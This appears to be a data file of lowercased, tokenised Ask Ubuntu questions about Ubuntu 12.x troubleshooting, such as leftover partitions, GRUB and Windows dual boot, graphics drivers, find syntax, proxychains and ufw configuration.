266172	how to get rid of a zero-size invisible partition left after deleting windows boot partition	computers sold with pre-installed windows 7 have a small `` system reserved '' boot partition at the beginning of the disk which is not really necessary as windows can boot alone or alongside ubuntu without this . so i 've decided to remove it from a couple of machines which went ok ( except the extra effort of moving/resizing partitions to the left and sometimes having to repair windows boot manager ) . in one of the machines , however , i was surprised to see that the new partition numbers start from 2 in gparted . and the output of fdisk -l is like this : device boot start end blocks id system /dev/sdb2 * 2048 52426751 26212352 7 hpfs/ntfs/exfat /dev/sdb3 52426752 942684159 445128704 7 hpfs/ntfs/exfat /dev/sdb4 942684160 976773119 17044480 12 compaq diagnostics it took me some time to discover that the reason for this was the fact that somehow a zero-size invisible partition was left after i deleted that partition as seen in the output of sfdisk -l below : device boot start end # cyls # blocks id system /dev/sdb1 0 - 0 0 0 empty /dev/sdb2 * 0+ 3263- 3264- 26212352 7 hpfs/ntfs/exfat /dev/sdb3 3263+ 58679- 55416- 445128704 7 hpfs/ntfs/exfat /dev/sdb4 58679+ 60801- 2122- 17044480 12 compaq diagnostics apart from the unseemly partition numbering , i 'm curious to know how i can ged rid of this weird partition ?
266173	minecraft server ( bukkit ) .sh bash file not opening	my minecraft server ( bukkit ) .sh bash file is not opening ! i did make it executable ( in permissions , i clicked `` anyone '' for executable ) . here 's the code : # ! /bin/bash cd `` $ ( dirname `` $ 0 '' ) '' java -xms1024m -xmx1024m -jar craftbukkit.jar -o true the server runs fine when i put the code in terminal but not when it 's in a .sh file . i am using lubuntu 12.10 .
266177	print using only black on canon mp280 and 12.04	i am using 12.04 and have a canon pixma mp288 . as the colour cartridges are so expensive i want to print only using the black cartridge , but there seems to be no way to do this and the answers provided here so far do not work . i am sure this was possible using windows . is it just a driver problem ?
266179	how to exclude/ignore hidden files and directories in a wildcard-embedded `` find '' search ?	starting from ( notice the wildcards before and after `` some text '' ) find . -type f -name '*some text*' how can one exclude/ignore all hidden files and directories ? i 've already been googling for far too long , came across some -prune and ! ( exclamation mark ) parameters , but no fitting ( and parsimonious ) example which just worked . piping | to grep would be an option and i 'd also welcome examples of that ; but primarily i 'm interested in a brief one-liner ( or a couple of stand-alone one-liners , illustrating different ways of achieving the same command-line goal ) just using find . ps : find files in linux and exclude specific directories seems closely related , but a ) is not accepted yet and b ) is related-but-different-and-distinct , but c ) may provide inspiration and help pinpoint the confusion ! edit find . \ ( ! -regex '.*/\.. * ' \ ) -type f -name `` whatever '' , works . the regex looks for `` anything , then a slash , then a dot , then anything '' ( i.e . all hidden files and folders including their subfolders ) , and the `` ! '' negates the regex .
266180	tried to make usb stick from osx	when trying to make a usb stick for mac i got this error : macbookpro-username : ~ username $ hdiutil convert -format udrw -o ~/ubuntu/usb-overdrive-302.img ~/ubuntu/ubuntu.iso hdiutil : convert failed - no such file or directory . any help appreciated . thanks .
266187	minecraft bug on 12.10 ?	i 'm having issues running minecraft on 12.10 . it loads up the log in screen , after i click 'log in ' it goes to a black screen .
266188	how can i save files on my hard drive	as i am new on ubuntu operating system . how can i save my files , music , photos , doc , ect . on my hard drive i got two partition each 300gb . and filesystem . when i open the partition i found in it files and doc , and i ca n't remove it . and also i ca n't save any thing on my partition i just want to save my files like i always done on windows so what ever happen my files is save on my hard drive . the partition location is ( /media ) file system type ext3/ext4 p.s : i think this is because it 's not a writeable . so how can i fix it or save files like on window . hope for a fast replay , with a solution .
266189	how to install qt sdk ( qt 4.x ) by apt-get ( the full version ) ?	i 've installed qtsdk-offline-linux-x86-v1.2.1 on ubuntu 12.10 it has some bugs , crashes all the time . it does not appear in the ubuntu software center and would not upgrade to the new version by apt-get upgrade . how can i install the qt sdk 4.x ( the version on ubuntu repository ) by apt-get ( what command should i use ) ? i just want it to be upgradable to new version ( when system is getting upgraded ) and be completely installed ( all libraries are needed just like qt sdk offline installer )
266190	windows loader after grub	i have installed ubuntu next to windows7 . when i restart pc , mbr loads windows loader first then if i choose linux , i have grub loaded . my problem is that i would like grub to be loaded first . any ideas gentlemens how to solve my problem ? ; )
266193	ubuntu 12.10 screen starts flickering after reboot	i have a sony vaio e series laptop . and i recently installed ubuntu 12.10 on it . it was running all smooth without any problem , till i updated it ( as we have to do after any normal installation of ubuntu ) . but as i updated the system , it asked me to restart the system ( which again is a normal thing ) , but after reboot , when the ubuntu 12.10 login screen came , it was all flickering . nothing was properly visible , though i heard the sound , when the login screen come 's . interestingly when i took the mouse to the top of the screen , it was partly visible . also when i closed the lid the system went to sleep , and after resuming the screen was all ok again . but still , can you help with this problem of flickering . thank you !
266195	perl library for unity	is there a perl library for the unity launcher ? apparently there needs to be one to be able to write feedback to the launcher ( like message counts ) but so far i have n't been able to find one . so i am wondering if its even possible to make it work . here 's the explanation . i am using the kildclient mud client , which is written in perl . so far so good right ? well , if i want to write a plugin to allow feedback to the launcher , i 'm going to need something that can use perl . right ? unless of course there 's command-lines to be used for that ( which theoretically would make it even easier ) ... kildclient is a mu client , or chat client , and i want to have a message count added so i stop missing every messages while i 'm checking videos on youtube or something . i 've seen x-chat being able to do those messages when receiving an important message , so i would like to be possible to do the same via perl ! thank you .
266201	what is the best linux distro for playing youtube videos on asus eeepc 4g ?	i 'm from portugal . i would like to know wich linux based os is the best to use on a asus eeepc 4g ? i now have eeebubtu 3.0 and firefox 3.5 but it does n't play the youtube videos , something about a missing plugin that it ca n't find on his own . i think it 's all about html5 and flash . i want this netbook only to use the internet , in all the ways that the internet disposes , and some text writing and movies . thanks asib
266210	determining size of the partition when using ubuntu installer	i would like to install ubuntu 12.04 alongside with windows 7 using the ubuntu installer , following the official guide . i first chose `` install ubuntu '' , then `` install ubuntu alongside windows 7 '' , but in the next step , when i tried to allocate disk space by dragging the divider , i was n't able to give ubuntu less than 32 gb . my harddisk has 500 gb , and as the guide states , `` ubuntu needs about 4.5 gb to install , so add a few extra gb to allow for your files . '' - this surely does not mean more than 10-15 gb ? is there a quick and easy way to install ubuntu on a partition of exactly this size , i.e . without having to choose the `` something else '' option at the beginning of the installer procedure ? maybe someone can explain me why appaerently there is a minimum of 32 gb , given the overall size of my hdd ?
266214	gpu driver problem	i installed wubi 12.04 lts . after restart , ubuntu says its starting for the firts time and gives an error : `` stopping system v runlevel compatibility [ ok ] '' . then monitor starts to go black and come back every second . my gpu : sis 651_661fx_741_760_760gx_m661fx_m661mx_m741_m760_m760gx after searching for a bit i found that i have to install the driver manually . driver is here : `` http : //w3.sis.com/support/support_faqs_16.htm '' and i dont know what to do with it . i am using windows xp sp3 . the reason i installed wubi at the beginning was to see if my wireless adapter ( tl-wn721n ) works . i may not have internet connection . thanks in advance .
266215	how to make ubuntu backups readable on windows	i want to backup my files in ubuntu 12.04 to an external drive in a way that they are accessible from my wife 's computer which is not ubuntu , it 's windows . how do i do that ? i do n't want any compression or encryption , just the files in their trees in a way that is readable when the external drive is connected to a windows-based machine .
266218	how to run a bash .sh after starting a program in playonlinux ?	i have a little script that needs executing every time i open a wine program . the script is pretty simple : # ! /bin/bash xdotool windowmove 67108871 1440 0 how do i get playonlinux to run this script every time i open a certain program ?
266224	problem installing multiple desktop environments ?	i currently have unity and gnome 3.6 installed on my computer and i want to check out the kde desktop environment . is there problem installing multiple desktop environs on my desktop ?
266234	how to add support of windows-1251 encoding for mp3 tags for vlc player	i have trouble to view mp3 tags info using vlc player . the mp3 tags are represented in windows-1251 encoding .
266235	ubuntu software center crashes	i recently installed ubuntu 12.04 on my vaio ... but the ubuntu software center crashes seconds after i open it.i tried reinstalling it using 'sudo apt-get install software-center ' but got an error that says as follows- reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i tried many solutions given in various sites but none worked..please help !
266251	hp truevision webcam not working in 12.10	i have a laptop with an hp truevision built-in webcam that is not working under ubuntu 12.10 . not in skype , not in google hangouts . it used to work on 12.04lts , but then stopped working after an update . i upgraded to 12.10 hoping that it would help , but it 's still down , even though it worked fine from the live-usb ( ! ) and i could take my picture with it .
266253	how to make ubuntu tweak not to remove fglrx	i made a clean installation of ubuntu 12.04 and after updating the packages , to make my intel/amd hybrid to work i installed fglrx by following `` amd/intel hybrid graphics works `` in ubunut forums . to clean up my system i use ubuntu tweak . but in addition to removing unwanted packages ubuntu tweak removes my fglrx stating that it 's totally unused . i want to know why this happens and is there any way of stopping fglrx getting removed ? the scenario output of uname -r 3.5.0-25-generic installed kernels , output of dpkg -- list | grep linux-image ii linux-image-3.5.0-25-generic 3.5.0-25.39~precise1 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-generic-lts-quantal 3.5.0.25.32 generic linux kernel image when i use ubuntu tweak the lts quantal generic kernel gets uninstalled , making fglrx to be removed as an unused package . making my graphics card not to function . i only rarely use my integrated card and primarily use my discrete card . so how to circumvent this problem ? my config : ubuntu 12.04/gnome3 intel hd4000/amd hd 7730m ubuntu tweak latest version
266257	microphone not working with steelseries 5hv2 ubuntu 12.10	i have recently updated my packard bell easynote lm-81 to ubuntu 12.10 32-bit . i tried to start a skype conversation ( installed from the software center , without problems ) , when i found that my microphone in the headset is n't taking in the sound . the internal microphone in my computer worked fine though . i looked in sound settings , and from there i could see that it said `` microphone , built in audio '' if the microphone cable was plugged in , and it not , it said : `` internal microphone , built in audio '' . i have tried finding somewhere to download some software for the headset , but it did n't seem to work . i 'm not a ubuntu nerd , since i recently installed , so does anyone know what it might be ? the microphone worked fine when i was running windows 7 .
266258	ubuntu 12.10 keeps rebooting randomly	i just installed ubuntu 12.10 using the 'installing ubuntu with the windows installer ' ( wubi ) feature on the www.ubuntu.com to install it on my computer . my computer is a asus with 6 ggs for ram and duo pentium core i5 64 bit system . ubuntu keep turning off then restarting.. and i dont know why . it keeps doing a hard restart .
266260	can i develop a hybrid native/html5 app for the ubuntu phone ?	can i develop a hybrid app that was used in conjunction with the native api and html5 in ubuntu phone ? i know that it is possible to develop either native app or html5 app . however , i want to know to develop a native app that has a html5 ui ( hybrid ) in ubuntu phone .
266262	insert $ duration variable inside another line of code in a sh file	i found out about byzanz-record which can record your desktop and get the result as a gif , flash or other , i want to make a gui for personal use but i ca n't seem to get it working up until now i only have this # ! /bin/bash duration= $ ( yad -- title `` duration '' -- entry -- text `` please enter the duration in seconds '' ) x= $ ( yad -- title `` x possition '' -- entry -- text `` please enter the x posittion '' ) y= $ ( yad -- title `` y possition '' -- entry -- text `` please enter the y posittion '' ) with= $ ( yad -- title `` with '' -- entry -- text `` please enter the with '' ) height= $ ( yad -- title `` height '' -- entry -- text `` please enter the height '' ) name= $ ( yad -- title `` name '' -- entry -- text `` please enter the name or path for the file without the extension '' ) byzanz-record -- duration= $ echo $ duration -- x= ' $ ( echo $ x ) ' -- y= ' $ ( echo $ y ) ' -- width= ' $ ( echo $ with ) ' -- height= ' $ ( echo $ height ) ' ' $ ( echo $ name ) '.gif as you can see i want to input the variables duration , x , y , with , height and name after the '= ' sign in the command at the bottom , ( optional ) if you can , can you tell me how to put the multiple windows in a form i have yad and zenity
266265	access windows machines from ubuntu on local network by hostname	[ i 've searched a lot for a solution to this issue , but if someone wants to point me to a related question and/or answer , please do ! ] i have a local network over a broadband router with 3 windows 7 computers and an ubuntu virtualbox vm on a windows host . i can access the windows computers from one another just fine , and i 've configured samba on ubuntu so i can see and access the my-ubuntu computer from the windows machines as well . the problem is accessing windows machines from ubuntu by hostname . i can ping the windows machines from ubuntu by ip address , but i ca n't do a lookup by their names , win7-1 , win7-2 , win7-3 . i.e. , smbclient -l 192.168.2.5 is successful , but smbclient -l win7-1 is not . smbtree sometimes shows the following , sometimes does n't : workgroup \\my-ubuntu \\win7-1 \\win7-2 \\win7-3 for the sake of debugging i 've disabled all firewalls and enabled all read/write permissions everywhere ( since they 're all just my machines ) . i also know i can add entries to /etc/hosts for each individual machine , but i would like to learn how to get hostname lookup working dynamically question how can i set up what i want to work ? ubuntu is running in a virtualbox vm on a windows host with bridged networking set up , so i ca n't run a dns server within ubuntu ( or can i ? ) . i think other newbies would also really appreciate a high-level overview , of where the dns server should be , how the ubuntu machine should use it , whether i need to change anything in the windows machines ' settings..i 'm confused by all these packages and settings i 've come across - resolv , libnss-mdns , avahi , dnsmasq , winbind..i just want to install and use what i need !
266271	`` error parsing gtk-icon-sizes string : '' '' desktop grey with no icons	i 'm not sure which update did it - but at some point recently something broke my desktop . i now have a grey background ( instead of the gradient colour i had before ) and no desktop icons . right clicking on the desktop does n't produce a menu any more , either . my theme , sounds etc all seem to have been forcibly changed as well . also , when i attempt to start phpstorm , it hangs on the splashscreen , and console shows : error parsing gtk-icon-sizes string : '' anyone have a suggestion how i fix it , or even diagnose what the problem is ?
266272	open-source ati drivers & problems with gaming	i recently installed steam , and bought a few games , mainly to show support for games being ported to linux . my problem is as follows : my computer has an ati mobility radeon hd 3400 video card , running on open source drivers . the games wo n't run when i try to run them ( faster than light crashes the system , the cave just wo n't start ) . when i use the integrated intel chip as defaut graphics , this problem does not occur . i previously tried to install proprietary drivers for ati , but that was a disaster , so i reverted back to open source drivers if anyone knows the reason for this error , and perhaps a solution for it , please share your info . [ edit ] : i am using ubuntu 12.04 lts 64-bit
266279	ubuntu 3d not launching	i 've recently updated some packages , and since then i ca n't log in with ubuntu3d , i am forwarded to ubuntu 2d . i have 12.04 . what to do ?
266284	problems with gamma and backlight on intel hd graphics	i have a problem keeping my settings for gamma and backlight on an ubuntu 12.10 64-bit version . i can successfully set the values using the xgamma and xbacklight programs , however this settings get reset on restart . so i added a startup script which works , however whenever i switch to ac power or plugin hdmi the settings get reset . i tried using a loop/timer , but since setting this settings is quite an expensive operation , the entire ui blocks whenever i set them which is quite annoying . even using an if statement does n't help , because even though the gamma and backlight change , the xgamma and xbacklight programs are n't aware of it and still report old values . i do n't have a xorg.conf file and generating one fails , os i ca n't set the default values in there . my question would be , who is changing these values when display settings change ( lightdm , acpi or something ) ? and where can i specify default gamma and backlight values for those programs to use ?
266285	ca n't boot into windows 8 after installing ubuntu	i installed ubuntu 12.10 on my laptop about a week ago . although ubuntu works fine , i have not been able to boot back into windows 8 since then . after some digging , i found something called boot repair and used it . that did n't help either , but it generated this : http : //paste.ubuntu.com/5602278/ . i 'm new to this kind of stuff , so any help will be appreciated . if there 's something else you need to see , please tell me . thanks in advance . update 1 : so i went into the terminal , typed sudo update-grub , rebooted , entered recovery mode , and selected update grub bootloader . i let it do its thing , and when it finished , it told me to press enter , so i did . then i chose the reboot option , and it failed . so i shut down and started up again . i chose windows 8 ( loader ) , and this came up : pressing f8 and enter both just refresh that image . i had to reboot again . i then chose ubuntu in the grub menu ( the one you use to boot into ubuntu ) , and it glitched , so i had to restart . this happened to me 4 times ; each time it glitched differently . it finally worked on the 5th time . update 2 : i have a recovery partition , but everything in it except for the option to open the terminal is disabled . again , thanks in advance for any help .
266286	blocking mac address query	i tried to use the following command from iw tools : dev < devname > station set < mac address > plink_action < open|block > like this : iw dev wlan0 station set 30:14:4a:3e : f0:98 plink_action block . and i get the following error : command failed : invalid argument ( -22 ) . i do n't know what i am doing wrong . this is for my adhoc ( ibss ) mesh network so that i can force multihopping . i am using pc alix boards , and an atheros chipset and ath5k driver .
266289	proxychains does n't work	i configured proxychains like this : strict_chain proxy_dns tcp_read_time_out 15000 tcp_connect_time_out 8000 [ proxylist ] http ip1.myproxyserver.org 443 myuser mypass but when i try to use it with the proxychains wget -qo/dev/null http : //google.com it gives this : proxychains-3.1 ( http : //proxychains.sf.net ) |dns-request| google.com |dns-response| : google.com is not exist by removing the proxy_dns it gives this ( ! ! ) : proxychains-3.1 ( http : //proxychains.sf.net ) and does n't work at all . what is the problem ?
266306	how to correctly install bumblebee 3.1 with nvidia-experimental-310	bumblebee does n't work for me with the experimental nvidia driver . if i use nvidia current , everything is ok. uname -a linux adrian-k55vm 3.8.2-030802-generic # 201303031906 smp mon mar 4 00:07:09 utc 2013 x86_64 x86_64 x86_64 gnu/linux optirun glxspheres [ 4799.789206 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 4799.789252 ] [ error ] could not connect to bumblebee daemon - is it running ? more /var/log/syslog | grep bumblebeed gives this output my bubmblebee config
266308	does installing extra desktop metapackages increase `` start-up time '' ?	so , in the interest of feeling informed about the varied desktop environments that exist , i 've performed two apt-get install for xubuntu-desktop and lubuntu-desktop in recent months . i did n't really much care for either one , i guess i 've just come to appreciate the unity ux . at any rate , and entirely anecdotally speaking , i ca n't help but feel like ever since the first apt-get for xubuntu-desktop that load time was a little slower than before . talking from power on to the login screen here . not only that , but it replaced my loading screen with the xubuntu one : ( after downloading lubuntu-desktop , i feel more certain that the computer takes a little longer from power button to login screen ( and the splash screen was n't even present at last login , but honestly that seems cosmetic to me so i 'm not terribly concerned ) . of course , i 've never taken a stopwatch with me to watch things boot up , so this is nothing but my limited perception . i 'm on the verge of doing a re-install just to clear the win7 partition ( and possibly the win7 recovery partition , if that 's safe ) off this computer altogether as i just do n't use it , so this may be a moot point . but that does n't mean i wo n't get an itch to try out something like cinnamon desktop or any of the myriad that are out there , and so before i go recreating the same problem for myself - is it conceivable that the startup sequence gets a little wonky after installing all those desktop environments ?
266313	moving from windows install to full install for ubuntu 12.10	i have installed ubuntu 12.10 inside windows but would now like to do a full install . is this a matter of uninstall and reinstall or is there a short cut given that all updates are downloaded ?
266314	how can i prevent the screen from going black in vnc when inactive ?	when i 'm using vnc , the screen goes black after an inactivity for around 2 seconds . if i move the mouse or press a key the screen goes back however this is very annoying . i have kde 4.10 on both systems , i 'm tunneling the vnc through the ssh connection ( ssh -r5900 : localhost:5900 myhost ) from the server to my local computer . i 'm using x11vnc as a server and tight vnc as a client . i 've tried different vnc clients ( vinagre , real vnc , xvnc4viewer ) but the issue remains . also , i 've tried different settings to x11vnc server ( -sb 0 -nonap -noxdamage etc ) but nothing works for me . there is a thread on kubuntuforums with the same issue , but does n't seem to be resolved . do any of you have some idea what can be causing this behavior ?
266315	4th gen. ipod touch and syncing with rhythmbox on ubuntu 12.1	i recently set-up a dual boot with ubuntu 12.1 and windows 8 on my asus vivobook . i have a 4th gen. ipod touch that i 'd like to sync with rhythmbox but unfortunately it will not sync my music . when i plug the ipod into my machine i get several windows telling me that documents can not be read and i also get a window which says , `` ipod detected , '' but nothing happens . the window stays blank , and by this time rhythmbox usually freezes up . i have searched for some time now over the past two days and have yet to find out whether or not ipods running ios6 can be syned with rhythmbox . there are people that seem to have success via some methods while other people get nothing via the same tools . so , my question is : is there any way to sync the music on my 4th gen. ipod touch with rhythmbox while running ubuntu 12.1 ?
266319	what gui library does geary use ?	i am thinking of starting a small side project and developing a piece of software . i would like to base it 's design on geary , which i like very much . which gui library can i use to achieve this ? geary is written in vala , which i am not very interested in using . it would also be a shame if the method i used was not cross compatible . thanks
266322	what additional thumbnailers are available and how do i install them ?	question : ubuntu 's file manager , nautilus , comes with a wide support for file previews . these thumbnails are handled by helper programs called thumbnailers . the number of thumbnailers that come preinstalled with ubuntu are limited and thus some more exotic file types are n't rendered by default . what additional thumbnailers can i install to activate previews in these cases ? related q & as : how can i instruct nautilus to pre-generate thumbnails ? note : feel free to contribute to this list by editing the community wiki answer . if you do so please follow the guidelines in this meta discussion and use the preexisting pattern to keep the answer consistent .
266333	how to boot without monitor with 12.04 on a powerpc ( yaboot )	so i just successfully installed ubuntu 12.04 lts on my retired powermac g5 . everything is working great , but i would like to run this computer headless and use either ssh or vnc to control it . it appears that ubuntu or yaboot refuses to boot without a monitor being connected to the graphics card . i found : how to remove the graphical user interface ? but that only applies to grub , which i assume can not be used on a powerpc computer . i 'm assuming i need to change something in yaboot.conf , but i ca n't find an clear advice .
266334	how to make executable bin files accessible to gnome ?	i have several executable bin files in ~/bin and i want to launch them using the gnome environment . for example , pressing the super ( windows ) key , typing the name in the search bar and then launch it . how can i do this ? what directory will alt + f2 look for ? and are they ( search bar and alt + f2 ) the same one ?
266335	ubuntu 12.04 depends : postgresql-9.1-postgis	i am installing localwiki on a virtual machine hosted by 1 & 1.com it is ubuntu 12.04 . when i run sudo apt-get install localwiki as instructed by http : //localwiki.org/install/ , i get the following error the following packages have unmet dependencies : localwiki : depends : postgresql-9.1-postgis but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried on my own to install postgresql but i ended up making things worse . i just did a clean install on 12.04 and i was wondering if someone here could assist me further . thanks . edit : i even ran sudo apt-get install postgresql successfully and i still get the same error . edit : i also want to point out that i think it may be something with my server . it says that 1 & 1 installs the os with minimal os . when i tried the instructions of localwiki on a vm on my local machine with 12.04 , they worked perfectly . so i probably need to update something on my vm i am renting from 1and1 ? edit : i downgraded to 9.1.5 , since in another questions on here that seemed to work . it did n't work for me : (
266342	facebook shortcuts in ubuntu	i found this website which gives a number of shortcuts for facebook . http : //www.socialbakers.com/blog/1288-save-time-with-facebook-shortcuts they require you to hold control and alt , which are already defined in ubuntu . what is the best way to get around this ? i am using chromium . thank you
266343	showing a song over teamspeak	i want to show a song to some friends on team speak or over skype but i want to be able to speak and not have them hear the other things going on in the background .
266344	pro karaoke for ubuntu	i do a show and use compuhost which is not compatible with linux . is there a comparable program for ubuntu ? compuhost is a professional karaoke program .
266345	virus scanning for ssl/https connections . how ?	i am using havp and squid . how do i scan https connections with havp anti-virus ? right now , testing eicar http : //www.eicar.org/85-0-download.html proves that anti-virus havp is working with havp . on http only . https , the fake virus file downloads without warning . i 've read a few blurbs on sslbump from squid , but nothing coherent .
266351	how to change the background color of current day in the calendar ?	i use ubuntu 12.04 lts and i think the default color for the current day is not right . it lacks of contrast . for usability and accesibility purposes , it 's better to highlight a little bit more the current day . how can i do that ? should i send a change / improvement request to canonical ? see the attached screenshot . regards .
266353	new box , new to linux , would love advice	looking for recommendations on best distro for specs . tried ubuntu 12.04 and 12.10 and both ran extremely slowly . motherboard - biostar a780l3c processor - amd anthlon ii x3 445 3.1ghz memory - 8gb corsair vengeance ddr3 1600mhz hdd - wd 320gb wireless card - rosewill rnx-250pc2 pci card also bought a ocz vertex 2 80gb ssd drive with the intention of installing the os on the ssd , and using the wd as file storage , but ca n't seem to get it to be recognized by ubuntu or even the bios . figured it was a dud and moved on . having great difficulty with the wireless card as well . seems to drop support whenever i update the system , but works with the basic install of 12.04 and 12.10 .
266354	usb ubuntu install not booting	newbie here . i unfortunately installed hexxeh 's chromium os on my hdd vostro 1000 not realizing that it only works on ssd . learning things the hard expensive way again ! i want to overwrite it with ubuntu but when i try to boot from the usb stick , the vostro 1000 simply says the operating system is missing . i do n't understand why it matters if there is a pre-existing os or not as ubuntu ( i think ) just overwrites everything . chromium os replaced windows vista and now the hdd is gpt partitioned . is there a way to get the boot to work ?
266363	does adding a folder to your classpath add sub-folders ?	i am doing this in a script : if [ -d $ service_home/../config ] ; then classpath= '' $ service_home/../config : $ classpath '' fi and the /config folder has sub-folders in it also , will files in the subfolder be added to the classpath ?
266371	how do i install ubuntu 12.10 onto a usb	i 'm trying to get ubuntu to work on one of my usbs , first time the install took forever , and was super slow when run off the usb . so i tried formatting to ext2 , still really slow . anyone know of a step by step guide for installing or running ubuntu off your usb where it can keep your files ? when i try to make a bootable linux usb it wont save any progress when i try the `` try ubuntu '' option . whenever i end the session . nor does it let me log out or back in of that session . so anyone know of a way ?
266372	ubuntu 12.10 issue resuming from suspend	my laptop has been having issues coming out of suspend . it is running 12.10 . i 'm not sure what caused this to happen , as this started two or three days ago , and i do n't think i changed any system files or anything recently ( i have just been using ubuntu to code ) . here 's the problem . when i try to wake my laptop from suspend and log in , i get a screen with the side/start and top bars missing ( i 'm not sure what they 're actually called ... the start bar on the left has the shortcuts and icons for applications , and the top bar has the clock and wifi icons , etc ) . i can move around the windows that are on the screen , but i ca n't type . the only way to get out of it is to reboot . additionally , whenever i boot up , ubuntu encounters an internal error . i made an album with the error report , a picture of the problem , and some weird system dialog that is displayed when i try to shut down after this suspend error ( by pressing the power button ) . pictures are below :
266374	replace text with icon on desktop ?	when on my desktop , id like to have the ubuntu icon in the title bar instead of the default `` ubuntu desktop '' . is there any way to do this ? im running 12.10 , on an aao
266378	graphics problem in ubuntu 12.10	i just installed ubuntu 12.10 ( alongside windows xp , dual boot ) , but there are two issues which are both missing graphics . 1 ) the first is that whenever i start up ubuntu , i never see the loading screen that appears before the desktop is shown . the graphics is simply missing 2 ) the second is that whenever i open the `` dash home '' , i ca n't see the icons of the various applications i have n't done anything now besides installing ubuntu . is this a driver problem ?
266384	move ecryptfs .private directory to another partition	i do n't like to keep my data in the same partition as my home directory ; so i configure my machine with a small home partition which contains a symlink to my large data partition . for this reason , the default behavior of ecryptfs-setup-private utility does n't quite work for me . i would like the private directory in my home directory ; pointing to the .private encrypted directory located in my large data partition . is there an easy way to achieve this and still retain the automount behavior that i get with ecryptfs-setup-private ?
266387	what exactly is non-interactive program ?	man page for wget says name wget - the non-interactive network downloader . description wget is non-interactive , meaning that it can work in the background , while the user is not logged on . this allows you to start a retrieval and disconnect from the system , letting wget finish the work . by contrast , most of the web browsers require constant user 's presence , which can be a great hindrance when transferring a lot of data . wget is an example of non-interactive program i know . now my question is , how can wget be used without user logged on ? how does non-interactive programs work ?
266390	resolution changes if tv is restarted	i have mythtv connected to flat panel tv by hdmi . the resolution is correct only if the startup sequence is : tv on , then start the mythtv computer . with this sequence the resolution is 1280x720 , which is correct , and fills the tv screen . if the tv is now switched off , then back on , the picture is about half size . the resolution has changed to 1920x1080 . if the mythtv computer is started with the tv off , then the tv is turned on , the picture overflows the screen . the resolution is 1600x1200 in that case . /etc/x11/xorg.conf has only one option for monitor size , 1280x720 i added option ignoreedid true to both the device and monitor sections of xorg.conf , but it made no difference . how can i keep the resolution at 1280x720 after switching the tv off , then back on ? i found the resolution in the cases above by switching to backend and running xdpyinfo | grep -b2 resolution . system details : mythbuntu 12.04 64 bit mythtv 0.26 cpu/gpu amd zacate e35m1-m pro tv - aoc envision l32w761 , using hdmi input
266391	i can not updated my ubuntu 12.04 failed to fetch 403 `` two host req hdr ''	i have a problem these days , i can not update system . every time i try sudo apt-get update the answer is : failed to fetch 403 http : //archive.ubuntu.com/ubuntu/dists/precise/main/source/sources two host req hdr [ ip : 91.189.92.202 80 ] like where to fix it ? ...
266394	need to add hdd to existing ubuntu	i installed ubuntu 12.10 in one of my harddisk with windows 8 as dual boot . now i use ubuntu as my primary os . i found lack of space and purchased a new 3tb internal hdd . i do n't know how to add that to my linux os . please help . i did the partition using gparted and created a 100gb partition in ext4 file format . in my files , i need to mount always for viewing the contents of that disk . also , i am not able to create any folders or files as it shows that it is owned by root . thanks in advance . regards pk
266396	make install error : you do not appear to have the sources for the x-y-z kernel installed	i am trying to install dahdi on my newly installed machine , when i do a make install on the latest version , i get error : you do not appear to have the sources for the 3.5.0-25-generic kernel installed . make [ 1 ] : *** [ modules ] error 1 any suggestions ?
266404	can 1 partition span multiple physical disks ?	i have 4 disks on an ubuntu server box , can i create on partition that spans across those 4 disks ?
266414	want some advanced configuration with ufw	i 've read the ubuntu developer docs regarding the ufw here , but could n't find what i was looking for . it allows me to set rules for controlling in/out traffic based on source ip or port numbers , but what i want is to restrict based on applications . for example : ( 1 ) only firefox executable allowed to communicate on port 80 - outgoing ( 2 ) only apache/httpd executable allowed to communicate on port 80 - incoming , etc . ( hope you get what i 'm trying to imply - this is possible in windows firewall ) . i 'm not able to see how i can achieve this with ufw firewall ? or is there a better alternative to ufw which is able to do this on linux ?
266416	have to ctrl+alt+del to get grub menu hp pavilion ze2000 ubuntu 12.10	i 've got a hp pavilion ze2000 with a fresh install of ubuntu 12.10 and after i got my wireless working , ( 12.10 hp pavilion ze2000 wireless does n't work ) i 'm ready to tackle this grub menu issue . from a cold start or on reboot , i have to ctrl+alt+del to get the grub menu to come up so i can boot . at first i would power off then back on to get it , but after a while i figured out that cad works as well . i 've done sudo apt-get update and sudo apt-get upgrade so everything should be up to date ( i think ) . this is my first ubuntu install but i have played with a couple other linux flavors . after the grub menu comes up , the machine will boot no problem . any ideas ? thanks .
266419	how to solve the pkgproblemresolver error when upgrading to 12.04 ?	i am trying to upgrade my machine from 10.04 to 12.04 lts but i get the following error . the same error occurs both in gui and in terminal while doing dist-upgrade . e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i 've tried to remove libcv-dev as suggested in a comment to this blog post but i do n't have libcv-dev installed on my machine . package libcv-dev is not installed , so not removed the pastebin link for the contents of /var/log/dist-upgrade/apt.log - http : //pastebin.com/2gtrynay how do i resolve the error and upgrade my machine to 12.04 ? i 've tried the solutions given in the following answer but it did n't work for me : pkgproblemresolver error when running package manager and updating 12.04 these are the terminal output of commands mentioned in those answers : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get remove evolution-plugins reading package lists ... done building dependency tree reading state information ... done package evolution-plugins is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
266420	amd driver problems !	yesterday i installed the amd driver on my lubuntu 12.10 following this guide http : //m.itworld.com/software/306225/install-amd-catalyst-1210-driver-ubuntu-1210 ? mm_ref=http % 3a % 2f % 2fwww.google.com % 2fsearch % 3fhl % 3den % 26q % 3dinstall % 2bamd % 2bdrivers % 2bin % 2bubuntu , after rebooting my pc , the screen resolution went low ! and minecraft crashes each time i open it ! please help ! i can not change my screen resolution too as only one option is availalable !
